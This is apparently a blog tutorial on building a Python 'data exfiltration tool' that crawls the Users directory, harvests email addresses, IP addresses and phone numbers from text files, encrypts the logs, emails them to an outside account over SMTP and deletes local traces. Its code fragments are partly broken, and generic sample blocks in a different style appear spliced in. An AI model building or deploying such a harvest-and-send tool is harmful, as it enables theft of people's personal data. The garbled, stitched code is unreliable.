Building a Python data exfiltration tool

This tutorial explains how I created a hard drive crawler and extraction tool. The tool uses regex to match desired data patterns while scanning files with specified extensions.

Similar to my Advanced Keylogger project, I designed this to be used on the local host to prevent nefarious use. Unethical use of this program is strictly prohibited. Its purpose is to demonstrate why sensitive information needs secure, encrypted storage.

Storing sensitive information on an external hard drive (preferably encrypted) that stays disconnected when not in use is one of the safer options for private storage.

Anything connected to a network can potentially be accessed by malicious remote parties.

With that said, let’s get started!

Getting started with the data exfiltration tool

First off, make sure you get my code, and read the instructions thoroughly.

The program starts at line 113 of the file, where the main function is called inside a try-except statement. This runs the main function unless a keyboard interrupt is detected or an error occurs, in which case the error is logged and the program proceeds.

Main function block of the python data exfiltration tool

Now, let’s take a closer look at the main section of the code.

Recursive hard drive crawler

The crawler begins at line 11, starting up the timer from the time module for testing the program’s execution speed.

from time import time

def main():
    start = time()

Then it creates a directory in the specified path, sets that path as a variable, and establishes the variables of compiled regex patterns.

    pathlib.Path('C:/Tmp').mkdir(parents=True, exist_ok=True)
    path = 'C:\\Tmp\\'
    re_txt = re.compile(r'.+\.txt$')
    re_email = re.compile(r'^.+@(?:gmail|yahoo|hotmail|aol|msn|live|protonmail)\.com')
    re_ip = re.compile(r'(?:\s|^)[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}')
    re_phone = re.compile(r'(1?)(?:\s|^)[0-9]{3}-[0-9]{3}-[0-9]{4}')
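Before relying on patterns like these, it helps to check what they actually match. The following is a minimal sketch that runs the four patterns above against a few made-up strings held in memory. The sample file names and lines are assumptions for illustration (the IP address and phone number come from ranges reserved for documentation and fiction), not data from the original program.

```python
import re

# Patterns copied from the snippet above.
re_txt = re.compile(r'.+\.txt$')
re_email = re.compile(r'^.+@(?:gmail|yahoo|hotmail|aol|msn|live|protonmail)\.com')
re_ip = re.compile(r'(?:\s|^)[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}')
re_phone = re.compile(r'(1?)(?:\s|^)[0-9]{3}-[0-9]{3}-[0-9]{4}')

# Made-up sample inputs (hypothetical, for illustration only).
file_names = ['notes.txt', 'photo.jpg', 'archive.txt.bak']
lines = ['alice@gmail.com', 'server at 192.0.2.10', '555-010-0199', 'nothing here']

# match() anchors at the start of the string; the trailing $ anchors the end.
txt_files = [name for name in file_names if re_txt.match(name)]

# search() scans the whole line; re_ip can capture a leading space, so strip it.
emails = [line for line in lines if re_email.search(line)]
ips = [m.group().strip() for line in lines for m in re_ip.finditer(line)]
phones = [line for line in lines if re_phone.search(line)]

print(txt_files, emails, ips, phones)
```

One thing this kind of check makes visible: re_ip only counts digits and does not validate octet ranges, so a string such as 999.999.999.999 also matches.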

Once the necessary variables and logging are set, the crawling can begin!

Crawling logic

I start by opening the log file with a context manager, which automatically closes the file when its code block ends at line 50. Anything within the indented block of code can write to that file.

Since different information will be logged many times, this approach is better than repeatedly opening and closing the file.

Now that the log file is open, it’s time to use the walk function of the os module for recursive access to the file system.

On line 22, os.walk is pointed at the Users directory, since this directory tree is where users typically store most of their data.

for dirpath, dirnames, filenames in os.walk('C:\\Users\\', topdown=True):

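For each directory it visits, os.walk yields a tuple of three values: the path of the directory, a list of the subdirectory names in it, and a list of the file names in it. Unpacking the tuple as dirpath, dirnames, filenames in the for statement lets the loop use any or all of the three.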
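To see what os.walk hands back on each iteration, here is a small sketch that walks a throwaway directory created with tempfile instead of a real user directory. The file and folder names (a.txt, sub, b.txt) are made up for the example.

```python
import os
import tempfile

with tempfile.TemporaryDirectory() as root:
    # Build a tiny throwaway tree: root/a.txt and root/sub/b.txt
    os.mkdir(os.path.join(root, 'sub'))
    for rel in ('a.txt', os.path.join('sub', 'b.txt')):
        with open(os.path.join(root, rel), 'w') as fh:
            fh.write('sample\n')

    visited = []
    for dirpath, dirnames, filenames in os.walk(root, topdown=True):
        # Store paths relative to root so the result is easy to read.
        rel_dir = os.path.relpath(dirpath, root)
        visited.append((rel_dir, sorted(dirnames), sorted(filenames)))

print(visited)
```

With topdown=True the parent directory is always reported before its subdirectories, which is why the root entry comes first in the result.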

Here is how the crawler walks:

  • Log the path of the directories (log.write('Path => {}\n'.format(dirpath)))
  • Iterate through the directory names in the path and log them (for d in dirnames:)
  • For loop that iterates through the file names in the path and logs them (for file in filenames:)
    • If regex matches the file extension compiled in the pattern (if re_txt.match(file):)
      • Open the file and search through the file line by line
        • If regex matches one of the patterns (ip address, emails, or phone number), write the match with the path and file name to a separate log

You might notice that lines 40-44 look similar to the global logging set up in the introduction. It is the same logging code that is applied globally.

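except Exception as ex:
    # The remaining basicConfig arguments (such as the log file name and
    # format) are cut off in this listing, so only the level is set here.
    logging.basicConfig(level=logging.DEBUG)
    logging.exception('* Error Occurred: {} *'.format(ex))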

The crawler raises an error every time it tries to access a file that requires elevated permissions. Normally the global logging would suffice even if multiple errors are raised. Given how quickly the crawler moves through the files, however, it is possible that some threshold is hit when multiple errors occur within a few seconds of each other.

After experimenting, the solution was to add another logging try-except block within the loop to prevent the program from exiting.
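The general idea of handling errors per file, so that one unreadable file does not end the whole walk, can be sketched as follows. This is not the original program's code: the function name count_lines, the logger name, and the sample files are hypothetical, and a file containing invalid UTF-8 bytes stands in for a file that cannot be read.

```python
import logging
import os
import tempfile

logger = logging.getLogger('walk_demo')  # hypothetical logger name

def count_lines(root):
    """Return ({file name: line count}, [names of files that could not be read])."""
    counts, failed = {}, []
    for dirpath, _dirnames, filenames in os.walk(root):
        for name in filenames:
            full = os.path.join(dirpath, name)
            try:
                with open(full, encoding='utf-8') as fh:
                    counts[name] = sum(1 for _ in fh)
            except (OSError, UnicodeDecodeError) as ex:
                # Log and move on instead of letting one file stop the walk.
                logger.warning('Skipping %s: %s', full, ex)
                failed.append(name)
    return counts, failed

with tempfile.TemporaryDirectory() as root:
    with open(os.path.join(root, 'good.txt'), 'w', encoding='utf-8') as fh:
        fh.write('one\ntwo\n')
    # Bytes that are not valid UTF-8 stand in for a file that cannot be read.
    with open(os.path.join(root, 'bad.txt'), 'wb') as fh:
        fh.write(b'\xff\xfe\xff')
    counts, failed = count_lines(root)

print(counts, failed)
```

Because the try-except sits inside the inner loop, the failure is recorded and the loop continues with the next file. PermissionError is a subclass of OSError, so access-denied errors would be caught by the same clause.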

Encrypting the data

Because email is not guaranteed to be encrypted end to end, I decided to encrypt the data and to hash it before and after encryption so its integrity can be verified.

The encryption process:

  • Use the os.walk procedure to access the directory that was created to store the log files
  • For loop that iterates over each of the files in the specified path
  • Generates SHA512 hash of the plain text data and logs to file
  • Reads the plain text, uses key to then encrypt the data
  • Generates SHA512 hash of the encrypted data and logs to file
  • Uses a separate key to encrypt the file containing all the hash information
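The hashing steps in this list can be illustrated with hashlib from the standard library. This is a minimal sketch of the integrity check only: the encryption step is left out because the text above does not name the library used, and the helper name sha512_of_file and the sample file are assumptions made for the example.

```python
import hashlib
import os
import tempfile

def sha512_of_file(file_path, chunk_size=65536):
    """Return the SHA-512 hex digest of a file, read in chunks."""
    digest = hashlib.sha512()
    with open(file_path, 'rb') as fh:
        for chunk in iter(lambda: fh.read(chunk_size), b''):
            digest.update(chunk)
    return digest.hexdigest()

with tempfile.TemporaryDirectory() as tmp:
    sample = os.path.join(tmp, 'sample.log')
    with open(sample, 'wb') as fh:
        fh.write(b'example log line\n')
    before = sha512_of_file(sample)

    # Any change to the bytes on disk produces a different digest.
    with open(sample, 'ab') as fh:
        fh.write(b'tampered\n')
    after = sha512_of_file(sample)

print(before != after)
```

Comparing a stored digest with a freshly computed one is how a recipient can confirm that a file arrived unchanged. Reading in chunks keeps memory use flat even for large files.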

Encryption logic

Emailing the data

At this point the encrypted logged data is ready to send to the specified email account (lines 78-79).

A MIMEMultipart object is created and assigned to a variable, and then message fields such as To, From, and Subject are set.

    msg = MIMEMultipart()
    msg['From'] = email_address
    msg['To'] =  email_address
    msg['Subject'] = 'Success!!!'

Then, the same directory with the encrypted logs is iterated over again with the os.walk procedure.

If the files in the directory match the encrypted file regex pattern, they will be attached to the message.

if re_email.match(file):
     p = MIMEBase('application', 'octet-stream')
     with open(path + file, 'rb') as attachment:
     p.add_header('Content-Disposition', 'attachment;'   
                        'filename = {}'.format(file)) 

Finally, smtplib connects to the email provider's SMTP server on the given TCP port and sends the message to the email account.

    s = smtplib.SMTP('', 587)
    s.login(email_address, password)
    s.sendmail(email_address, email_address, msg.as_string())

Email logic

Cleaning up

The program finishes by shutting down the logging that was set up initially and removing the created directory along with all the logged contents.

There is no need to keep the data on the machine locally when it is now stored in an email account.

Finally, it reports how long the entire process took. On my system, that was around 45 seconds for the amount of .txt data present.

The overall execution time varies based on the scope of the file system that is being searched, the file extensions it matches, and how many files it matches.
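Measuring elapsed time the way the program does, by recording time() at the start and subtracting it at the end, can be sketched like this. The timed helper and the short sleep standing in for real work are hypothetical and only illustrate the pattern.

```python
from time import sleep, time

def timed(func):
    """Call func() and return (result, elapsed_seconds)."""
    start = time()
    result = func()
    return result, time() - start

# sleep() returns None, so the expression evaluates to 'done' after the pause.
result, elapsed = timed(lambda: sleep(0.05) or 'done')
print('Finished in {:.2f} seconds'.format(elapsed))
```

For benchmarking, time.perf_counter() is usually a better fit than time() because it is monotonic and has higher resolution, but time() is sufficient for a rough figure over a run lasting many seconds.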

Cleanup logic for the data exfiltration tool

That’s about it for this program, though it could be easily turned into a general search tool using a regex library for finding specific data FAST.

Hope you enjoyed it! If you did, you’ll probably also enjoy reading about my Advanced Python Keylogger.
